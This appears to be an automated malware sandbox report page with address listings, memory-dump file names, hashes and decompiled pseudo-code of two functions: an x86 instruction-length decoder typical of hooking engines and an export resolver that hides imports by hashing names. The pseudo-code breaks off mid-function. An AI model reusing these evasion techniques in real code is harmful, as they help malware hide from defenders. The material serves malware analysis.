0x6e868754
0x6e868754
0x6e868754
0x6e868754
0x6e868759
0x6e86875e
0x6e868760
0x6e868764
0x6e86876b
0x6e868770
0x6e868772
0x6e868ad3
0x6e868ae2
0x6e868afb
0x6e868b00
0x6e868b00
0x6e868785
0x6e86878a
0x6e86878e
0x6e86878e
0x6e86878e
0x6e8687a0
0x6e8687c1
0x6e8687c9
0x6e8687d7
0x6e8687f5
0x6e8687fb
0x6e8687fb
0x00000000
0x6e86870c
0x6e8685a4
0x6e8685a4
0x6e8685a6
0x6e8685ad
0x6e8685bb
0x6e8685bd
0x6e8685c1
0x6e8685c3
0x6e8685c5
0x6e868600
0x6e86860f
0x6e868611
0x6e868613
0x6e868631
0x6e868633
0x6e868635
0x6e868647
0x6e868665
0x6e86866e
0x6e868671
0x6e86867f
0x6e868690
0x6e8686ae
0x6e8686b0
0x6e8686b4
0x6e8686b4
0x6e8686b4
0x6e868635
0x00000000
0x6e868613
0x6e8685cb
0x6e8685cb
0x6e8685d0
0x6e8685d7
0x6e8685e6
0x6e8685ed
0x6e8685ef
0x00000000
0x00000000
0x6e8685fb
0x6e8685fc
0x6e8685fe
0x00000000
0x00000000
0x00000000
0x6e8685fe
0x6e8685f1
0x6e8685f4
0x00000000
0x00000000
0x6e8686b6
0x6e8686b6
0x6e8686b7
0x6e8686b7
0x00000000
0x6e868497
0x6e868497
0x6e868497
0x6e868499
0x6e8684a0
0x6e8684ae
0x6e8684b0
0x6e8684b4
0x6e8684b6
0x6e8684e2
0x6e8684e6
0x6e8684eb
0x6e8684f0
0x6e8684f4
0x6e8684f8
0x6e8684ff
0x6e868504
0x6e868506
0x6e868a95
0x6e868aa4
0x6e868ac3
0x6e868ac8
0x6e868ac8
0x6e868519
0x6e86851e
0x6e868522
0x6e868522
0x6e868522
0x6e868533
0x6e868535
0x6e868537
0x6e868548
0x6e868548
0x6e86854d
0x6e868552
0x6e868556
0x6e86855b
0x6e868562
0x6e868567
0x6e868569
0x6e868a57
0x6e868a63
0x6e868a7d
0x6e868a82
0x6e868a82
0x6e86857f
0x6e868584
0x6e868588
0x6e868588
0x6e868588
0x6e868588
0x6e86858b
0x6e86858b
0x00000000
0x6e86858b
0x6e8684ba
0x6e8684ba
0x6e8684bc
0x6e8684c8
0x6e8684cf
0x6e8684d1
0x00000000
0x00000000
0x6e8684dd
0x6e8684de
0x6e8684e0
0x00000000
0x00000000
0x00000000
0x6e8684e0
0x6e8684d3
0x6e8684d6
0x00000000
0x00000000
0x6e86858c
0x6e868590
0x6e868591
0x6e868591
0x00000000
0x6e868499
0x6e868491

Strings

, xrefs: 6E868A1A

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 9a13bbcdb8a7fdc555e9a0211e3fd7581dabdceb63bb39cc66d0c75505442aad
Instruction ID: c0f1ac72258753dc5234f4251f5b9d00d3b78f12ba40e1d9e67d657d187ee53c
Opcode Fuzzy Hash: 9a13bbcdb8a7fdc555e9a0211e3fd7581dabdceb63bb39cc66d0c75505442aad
Instruction Fuzzy Hash: 361271712083059FC724DFA8C990AAEB7E9FF95708F104D2DE699972A1EB30DD05CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E879370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6E879370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6E873698( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6e879377
0x6e87937b
0x6e879387
0x6e87938b
0x6e87938f
0x6e879394
0x6e879397
0x6e879399
0x6e87939b
0x6e87939b
0x6e87939e
0x6e8793a4
0x6e87941c
0x6e879420
0x6e879423
0x6e879423
0x6e879426
0x00000000
0x6e879426
0x6e8793ab
0x6e879413
0x6e879417
0x00000000
0x6e879417
0x6e8793b2
0x6e87940b
0x6e87940e
0x00000000
0x6e87940e
0x6e8793b7
0x6e8793f5
0x6e8793fc
0x6e8793ff
0x6e8793c8
0x6e8793c8
0x6e8793ce
0x00000000
0x00000000
0x6e8793d3
0x6e8793ed
0x6e8793f0
0x00000000
0x6e8793f0
0x6e8793d8
0x00000000
0x6e8793da
0x6e8793de
0x6e8793e1
0x00000000
0x6e8793e1
0x6e8793d8
0x6e879429
0x6e879429
0x6e879429
0x6e879432
0x6e87943b
0x6e87943e
0x6e879441
0x6e879444
0x6e879447
0x6e87944d
0x6e87948f
0x6e879492
0x6e879493
0x6e87949a
0x6e87949d
0x6e87944f
0x6e879453
0x6e87945d
0x6e879464
0x6e879466
0x6e87947f
0x6e879482
0x6e879482
0x6e879464
0x6e8794a5
0x6e8794a8
0x6e8794ab
0x6e8794af
0x6e8794b3
0x6e8794bd
0x6e8794c1
0x6e8794cb
0x6e8794d4
0x6e8794e1
0x6e8794e4
0x6e8794e7
0x6e8794e7
0x6e8794f3
0x6e8794fe
0x6e879504
0x6e879508
0x6e8794f5
0x6e8794f5
0x6e8794f5
0x6e879510
0x6e87953a
0x6e879540
0x6e879540
0x6e879548
0x6e8798f1
0x6e8798f7
0x6e8798fd
0x6e8798fd
0x00000000
0x6e87954e
0x6e87954e
0x6e879552
0x6e879555
0x6e879558
0x6e87955b
0x6e87955f
0x6e879561
0x6e879564
0x6e879567
0x6e87956b
0x6e879570
0x6e879573
0x6e879577
0x6e87957c
0x6e87957f
0x6e879581
0x6e879584
0x6e879588
0x6e87958d
0x6e87959d
0x6e8795a3
0x6e8795a3
0x6e8795ab
0x6e8795ad
0x6e8795b6
0x6e8795b8
0x6e8795bb
0x6e8795c6
0x6e8795f3
0x6e8795c8
0x6e8795df
0x6e8795df
0x6e8795fb
0x6e879601
0x6e879607
0x6e879607
0x6e8795fb
0x6e8795b6
0x6e87960e
0x6e87967f
0x6e879684
0x6e8796dd
0x6e87979f
0x6e8797a4
0x6e8797b3
0x6e8797b9
0x6e8797bd
0x6e8797c6
0x6e8797cd
0x6e8797d6
0x6e8797e4
0x6e8797e7
0x6e8797cf
0x6e8797cf
0x6e8797cf
0x6e8797cd
0x6e8797f0
0x6e87981d
0x6e879830
0x6e879838
0x6e87981f
0x6e879821
0x6e879829
0x6e879829
0x6e8797f2
0x6e8797f7
0x6e879816
0x6e8797f9
0x6e8797fe
0x6e87980f
0x6e879800
0x6e879800
0x6e879800
0x6e8797fe
0x6e8797f7
0x6e879840
0x6e87984f
0x6e87985c
0x6e879865
0x6e879869
0x6e87986d
0x6e879870
0x6e879873
0x6e879876
0x6e879879
0x6e87987c
0x6e879882
0x6e879886
0x6e87988c
0x6e87988c
0x6e879882
0x6e879892
0x6e8798cf
0x6e8798d3
0x6e8798da
0x6e8798e0
0x6e879894
0x6e879897
0x6e8798b7
0x6e8798bb
0x6e8798c2
0x6e8798c9
0x6e879899
0x6e87989c
0x6e87989e
0x6e8798a2
0x6e8798ac
0x6e8798b2
0x6e8798b2
0x6e87989c
0x6e879897
0x6e8798e7
0x6e8798e7
0x6e879900
0x6e879900
0x6e879906
0x6e87990b
0x6e879965
0x6e87996a
0x6e8799a9
0x6e8799ae
0x6e8799b0
0x6e8799b4
0x6e8799b7
0x6e8799ba
0x6e8799bc
0x6e8799bd
0x6e8799bd
0x6e8799c2
0x6e8799e0
0x6e8799e2
0x6e8799e6
0x6e8799ec
0x6e8799ef
0x6e8799f1
0x6e8799f2
0x6e8799f2
0x00000000
0x6e8799c4
0x6e8799c4
0x6e8799c4
0x6e8799c8
0x6e8799ce
0x6e8799d1
0x6e8799d3
0x6e8799d6
0x6e8799f5
0x6e8799f5
0x6e8799fc
0x6e879a16
0x6e8799fe
0x6e8799fe
0x6e879a0a
0x6e879a0b
0x6e879a0e
0x6e879a0e
0x6e879a24
0x6e879a24
0x6e8799c2
0x6e87996f
0x6e87997d
0x6e879995
0x6e879999
0x6e87999c
0x6e8799a2
0x6e8799a6
0x6e8799a6
0x00000000
0x6e8799a6
0x6e87997f
0x6e879983
0x6e879989
0x6e879989
0x6e87998f
0x00000000
0x6e87998f
0x6e879971
0x6e879975
0x00000000
0x6e879975
0x6e87990f
0x6e87993b
0x6e879953
0x6e879957
0x6e87995a
0x6e87995d
0x6e87995f
0x6e879962
0x6e87993d
0x6e87993d
0x6e879941
0x6e879944
0x6e879947
0x6e87994a
0x6e87994d
0x6e87994d
0x00000000
0x6e87993b
0x6e879915
0x00000000
0x00000000
0x6e87991b
0x6e87991f
0x6e879925
0x6e879928
0x6e87992b
0x6e87992e
0x00000000
0x6e87992e
0x6e8797a6
0x6e8797aa
0x6e8797b0
0x00000000
0x6e8797b0
0x6e8796e8
0x6e8796fa
0x6e8796ff
0x6e87976a
0x00000000
0x00000000
0x6e879771
0x6e879797
0x6e87979b
0x00000000
0x00000000
0x6e87977a
0x6e87977f
0x6e879793
0x00000000
0x00000000
0x00000000
0x6e879795
0x6e879786
0x00000000
0x00000000
0x6e87978b
0x00000000
0x00000000
0x6e87978d
0x00000000
0x6e879771
0x6e879701
0x6e87970b
0x6e87971c
0x6e87971f
0x6e879722
0x6e879728
0x00000000
0x00000000
0x00000000
0x00000000
0x6e87972e
0x6e87972e
0x6e87972e
0x6e879735
0x00000000
0x00000000
0x6e879737
0x6e87973a
0x6e879740
0x00000000
0x00000000
0x00000000
0x6e879742
0x6e879744
0x6e87974d
0x00000000
0x00000000
0x6e879761
0x00000000
0x00000000
0x00000000
0x6e879763
0x6e8796ef
0x00000000
0x00000000
0x00000000
0x6e8796f5
0x6e879689
0x6e8796b8
0x6e8796b9
0x6e8796c2
0x00000000
0x6e8796d3
0x00000000
0x6e8796d3
0x6e879690
0x6e879693
0x6e8796a6
0x6e8796a7
0x6e8796ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e879693
0x6e879689
0x6e879615
0x6e879672
0x6e879676
0x6e87967c
0x00000000
0x6e87967c
0x6e879617
0x6e87961b
0x6e879628
0x6e87962c
0x6e879642
0x6e87964a
0x6e87962e
0x6e879630
0x6e87963a
0x6e87963a
0x6e879650
0x6e879659
0x6e879670
0x00000000
0x00000000
0x00000000
0x6e879670
0x6e87965b
0x6e87965b
0x00000000
0x6e879650

Strings

, xrefs: 6E8799DB

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction ID: 837c36175cd3272158c7b781e85b9ce7758b39510a397c44cebbf394cbf0397b
Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction Fuzzy Hash: 9B22923040C39A8BDB24CE59C4A136EBBE1FF86310F068D6DE8E55B2D1D3359985CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E87143C, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6E87143C(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6E870304(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6e87d208 == 0 ||  *0x6e87d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6E874FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6e87d2f0 |  *0x6e87d2f1;
									if(( *0x6e87d2f0 |  *0x6e87d2f1) == 0) {
										_t525 =  *0x6e87d208; // 0x2e81340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6e87d2f0 = 1;
											_t526 = E6E87361C(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6E871C30(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6e87d208 = _t526;
											 *0x6e87d2f0 = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6E87361C(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6E871C30(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6E86DFC0(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
